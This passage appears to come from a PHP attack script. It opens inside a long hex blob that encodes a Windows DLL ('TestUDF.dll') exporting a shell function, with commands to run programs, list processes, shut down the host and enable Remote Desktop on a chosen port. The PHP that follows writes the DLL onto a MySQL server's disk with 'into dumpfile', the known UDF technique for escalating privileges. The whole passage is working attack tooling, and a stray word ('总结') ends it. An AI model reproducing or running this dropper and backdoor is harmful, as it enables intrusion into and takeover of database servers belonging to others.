00064697361626C6500656E61626C65000070000000000000004445534352495054494F4E3A0D0A202020202020202020202020436F6E666967205465726D696E616C205365727669636520537570706F72747320323030302F78702F323030332E0D0A55534147453A0D0A2020202020207465726D737663202D656E61626C65202D64697361626C65202D76696577202D70203C6E6577706F72743E202D7175657279202D6C6F676F6666203C73657373696F6E2069643E0D0A2020202020202D656E61626C6520202020456E61626C65205465726D696E616C20536572766963652E0D0A2020202020202D64697361626C6520202044697361626C65205465726D696E616C20536572766963652E0D0A2020202020202D7669657720202020202056696577205465726D696E616C20536572766963652053657474696E67732E0D0A2020202020202D70202020202020202020536574204E6577205465726D696E616C205365727669636520506F72742E0D0A6578616D706C653A0D0A2020202020207465726D737663202D71756572790D0A2020202020207465726D737663202D6C6F676F666620310D0A2020202020207465726D737663202D656E61626C65202D7020333339390D0A2020202020207465726D737663202D7020333339390D0A2020202020207465726D737663202D766965770D0A0099210010D1210010E22100100C2200100000000000000000C000000000000046762F0010762F0010762F0010F7230010D5240010F723001099210010D1210010E22100102D2400102E4F4350000000000D0A68656C700D0A436D6420202020202020202D3E0D0A45786563202020202020202D3E0D0A53687574646F776E2020203D3E0D0A70732020202020202020203D3E0D0A5465726D537663202020203D3E0D0A0D0A000000556E6B6E6F776E20436F6D6D616E642E3A28200D0A0D0A005465726D537663007073000073687574646F776E000000004578656300000000436D6400455F4F55544F464D454D4F52590000003F00000068656C7000000000FFFFFFFFFA3000102005931901000000804A0010000000000000000000000000000000008C4B00000000000000000000E24E000034400000844C00000000000000000000004F00002C410000584B00000000000000000000EE4F0000004000009C4C000000000000000000000E50000044410000104C000000000000000000004C500000B84000001C4C000000000000000000002E510000C4400000704C00000000000000000000AA510000184100008C4C00000000000000000000FA510000344100000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000071025365744C6173744572726F7200009E025465726D696E61746550726F6365737300001B00436C6F736548616E646C65001A014765744C6173744572726F7200009602536C65657000DF02577269746546696C6500CE0257616974466F7253696E676C654F626A6563740018025265616446696C650000F9015065656B4E616D65645069706500440043726561746550726F63657373410000500147657453746172747570496E666F41004300437265617465506970650000F70047657443757272656E7450726F63657373006D014765745469636B436F756E740000EF014F70656E50726F63657373003E0147657450726F63416464726573730000C2014C6F61644C696272617279410000D2025769646543686172546F4D756C74694279746500B001496E7465726C6F636B6564496E6372656D656E740000AD01496E7465726C6F636B656444656372656D656E740000D6014D6170566965774F6646696C6500350043726561746546696C654D617070696E67410000B002556E6D6170566965774F6646696C6500120147657446696C6553697A6500570044656C65746546696C654100340043726561746546696C654100630147657454656D7046696C654E616D65410000650147657454656D7050617468410000550044656C657465437269746963616C53656374696F6E00C1014C65617665437269746963616C53656374696F6E00006600456E746572437269746963616C53656374696F6E0000AA01496E697469616C697A65437269746963616C53656374696F6E004B45524E454C33322E646C6C0000D3004578697457696E646F77734578005553455233322E646C6C0000170041646A757374546F6B656E50726976696C6567657300F5004C6F6F6B757050726976696C65676556616C7565410042014F70656E50726F63657373546F6B656E0000EF004C6F6F6B75704163636F756E745369644100D000476574546F6B656E496E666F726D6174696F6E005B01526567436C6F73654B6579007B01526567517565727956616C7565457841000072015265674F70656E4B657945784100860152656753657456616C75654578410000640152656744656C65746556616C7565410071015265674F70656E4B657941005E015265674372656174654B6579410041445641504933322E646C6C00002E00436F496E697469616C697A65457800006F6C6533322E646C6C000B013F3F315F4C6F636B697440737464404051414540585A0000A2003F3F305F4C6F636B697440737464404051414540585A00004D5356435036302E646C6C005753325F33322E646C6C00003D0261746F6900005E02667265650000B202737072696E74660091026D616C6C6F63000059015F6D6273636D70005F015F6D627369636D700000BE027374726C656E00000F003F3F3240594150415849405A0000C502737472737472000099026D656D7365740000E6027763736C656E000049005F5F4378784672616D6548616E646C65720096026D656D636D70000092015F7075726563616C6C00AD027365746C6F63616C6500DC0276737072696E74660000BA027374726370790000C1015F73747269636D7000004D53564352542E646C6C00000F015F696E69747465726D009D005F61646A7573745F6664697600000C004765744D6F64756C65426173654E616D654100000E004765744D6F64756C6546696C654E616D6545784100000400456E756D50726F636573734D6F64756C657300000500456E756D50726F6365737365730050534150492E444C4C000800575453467265654D656D6F7279000C00575453517565727953657373696F6E496E666F726D6174696F6E41000600575453456E756D657261746553657373696F6E73410057545341504933322E646C6C000057494E494E45542E646C6C0000000000000000000000000000000000BFC7514B00000000665200000100000003000000030000004852000054520000605200003314000020140000F4130000725200007852000085520000000001000200546573745544462E646C6C007368656C6C007368656C6C5F6465696E6974007368656C6C5F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000D0490010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000140100000F30163039304E305D307330C430F630043110313F3166317C319C31A531BD31F6310F3231323B3242325A327432B332C632D532193336338733A433F833013407340D34293439349634B234C334DB34033510356D357E359D351436CD36D436DC360137373723383238623874389D38B8382B3969398D39AF39E839013A113A403A483A5D3A713A803ACE3ADF3AE53AF33AF83A063B403B503B693B723B823B8B3B9B3BA43BE43B033C123C1B3C203C263C2D3C343C4A3C533C583C5E3C653C6C3CA53CAB3CC43C333D443D683D6F3D7C3D833D9F3DFC3D013E1E3E2C3E4F3E553E803E9E3EA33EC63EEF3EF63E023F203F403F573F603F713F813F8C3F963FBF3FC53FDC3FF63FFF3F000000200000F0000000283051305830653076308E30B230D230E130F53012312C3146315D317231A431DB31EE3116323C32533268328532A832B332BE32D432F43245336D33B633BB33C233C933CF33143456345D34663475349E34A4341935413555358435AE35C335D5350C36473675369336BC36EE368B37B637F0383739E839EE39F639FD39093A123A263A6A3A713A913AD03BD63BDE3BE43BEE3B123C9A3CBA3CF63C3C3D873D953D9E3DB13DD33DDD3D013E1F3E3D3E5B3E7E3E8E3EB83ECD3ED43EF03EF63EFC3E023F423F723F783F7E3F8C3F943F9A3FA53FB23FBA3FC83FCD3FD23FD73FE23FEF3FF93F000000300000280000000E301A30203042305430B030CC30D230D830DE30E430EA30F030F63003310000004000002C00000098318039843988398C39A039A439A839AC39B039B439B839BC39C039C439843A903A0000006000000C00000014300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,CHAR))'); if (mysql_errno($conn) != 0) { echo mysql_error().'<br/>'; mysql_close($conn); exit(); } mysql_query('select c from udftmp into dumpfile "'.$path.'"'); if (mysql_errno($conn) != 0) { echo mysql_error(). '<br/>'; mysql_query('drop table udftmp'); mysql_close($conn); exit(); } mysql_query('drop table udftmp'); if (mysql_errno($conn) !=0) echo 'Dump DLL Failed.'.mysql_error(); else echo 'Dump DLL Success!'; mysql_close($conn); } ?> </body> </html>

总结